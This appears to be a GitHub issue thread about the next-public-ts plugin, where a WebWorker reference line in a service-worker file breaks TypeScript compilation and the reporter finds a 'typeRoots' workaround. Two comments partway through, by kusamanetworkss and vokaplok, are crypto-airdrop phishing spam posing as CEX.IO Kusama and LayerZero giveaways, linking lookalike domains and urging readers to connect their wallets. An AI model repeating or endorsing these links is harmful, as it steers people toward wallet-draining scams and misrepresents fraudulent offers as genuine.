### ISSUE TITLE
<reference lib="WebWorker" /> in sw.ts breaks app

### ISSUE THREAD

**Issue by mrdomino** [Yovach/next-public-ts#42] opened 2023-10-28 15:34 UTC
Continued from <https://github.com/vercel/next.js/issues/33863#issuecomment-1783846196>.

Summary: with `app/+public/sw.ts` (does this need to actually be in a directory `[root]` under the repository root? I just put it under the root itself), TypeScript will fail to compile my components, with messages like e.g. "`Property 'serviceWorker' does not exist on type 'WorkerNavigator'`".

**Comment by mrdomino** [comment] 2023-10-28 15:36
Just tried putting it at explicitly named `[root]/app/+public/sw.ts`. Same issue.

**Comment by Yovach** [comment] 2023-10-28 15:55
The `[root]` is for the root of the project, you are free to have your own structure.

If you use the `inputDir` options, you will need to specify the path to your TS files that you want to compile. You can also use `autoDetect` but that implies to place all of your TS files (that you want to compile into the `public` folder) to be in a folder named `+public`. Then, the plugin will map the same structure.

e.g.: You can see an example of this in the following example: https://github.com/Yovach/next-public-ts/tree/main/examples/auto-detect/app/%2Bpublic

I can't reproduce this problem, can you provide an example of reproduction so that I can investigate on my own?

**Comment by Yovach** [comment] 2023-10-28 15:56
> Just tried putting it at explicitly named `[root]/app/+public/sw.ts`. Same issue.

I can't reproduce this problem, can you provide an example of reproduction so that I can investigate on my own?

**Comment by mrdomino** [comment] 2023-10-28 16:02
I have `inputDir: path.join(__dirname, 'app', '+public')` in my plugin configuration. Is there anything further needed?

The full plugin config is currently:
```javascript
new NextPublicTsPlugin({
    inputDir: path.join(__dirname, 'app', '+public'),
    outputDir: path.join(__dirname, 'public')
})
```

**Comment by Yovach** [comment] 2023-10-28 16:04
> I have `inputDir: path.join(__dirname, 'app', '+public')` in my plugin configuration. Is there anything further needed?

No, it should be fine. If an `sw.js` is compiled in the `public` folder then it works

**Comment by mrdomino** [comment] 2023-10-28 16:55
It is indeed. Just breaks `tsc` on the app.

**Comment by mrdomino** [comment] 2023-10-28 16:55
(If I remove the reference line, the errors go away.)

**Comment by Yovach** [comment] 2023-10-28 17:22
I'm going to work on my own to remove this line but it will involve a file like `tsconfig.service-worker.json` from what I've seen

**Comment by mrdomino** [comment] 2023-10-28 17:34
I think it would be best to keep the line in place, but not have it pollute the rest of the app. That's usually how they work IIUC.

**Comment by Yovach** [comment] 2023-10-28 21:05
Do you have a reproduction example for 

> TypeScript will fail to compile my components, with messages like e.g. "Property 'serviceWorker' does not exist on type 'WorkerNavigator'".

I have not been able to reproduce this case. I can provide an example with a new folder structure (`tsconfig.json`) but this can be difficult to maintain so I'm not happy with this solution.

**Comment by mrdomino** [comment] 2023-10-31 14:45
The behavior seems to be triggered by including a `types` field in tsconfig.json. E.g.:

```js
{ // tsconfig.json
  "compilerOptions": {
    ...,
    "types": [
      "./node_modules/typescript/lib/lib.dom.d.ts",
      "./node_modules/typescript/lib/lib.dom.iterable.d.ts",
      "./node_modules/typescript/lib/lib.esnext.d.ts",
      "@types/node",
      "@types/react",
      "@types/react-dom"
    ]
  }
}
```

(An empty array will also trigger the behavior, but the above is an example config that will work with a project.)

**Comment by Yovach** [comment] 2023-10-31 15:07
I dont use `compilerOptions.types` field in my projects and I don't have any issue with `next-public-ts`

Which version of TypeScript do you use?

**Comment by mrdomino** [comment] 2023-10-31 15:15
5.2.2.

I need `types` for this project to pull in `@webgpu/types` which is not under the `@types` namespace for some reason.

**Comment by mrdomino** [comment] 2023-10-31 15:45
Hmm. I seem to be able to work around the issue by specifying `typeRoots` instead of `types` in `tsconfig.json`.

**Comment by kusamanetworkss** [comment] 2023-12-10 02:23
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by vokaplok** [comment] 2023-12-22 01:28
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by Yovach** [comment] 2023-12-22 09:00
Can I close the issue as the problem seems to have been resolved?

**Closed as completed** 2024-01-02 11:34 UTC
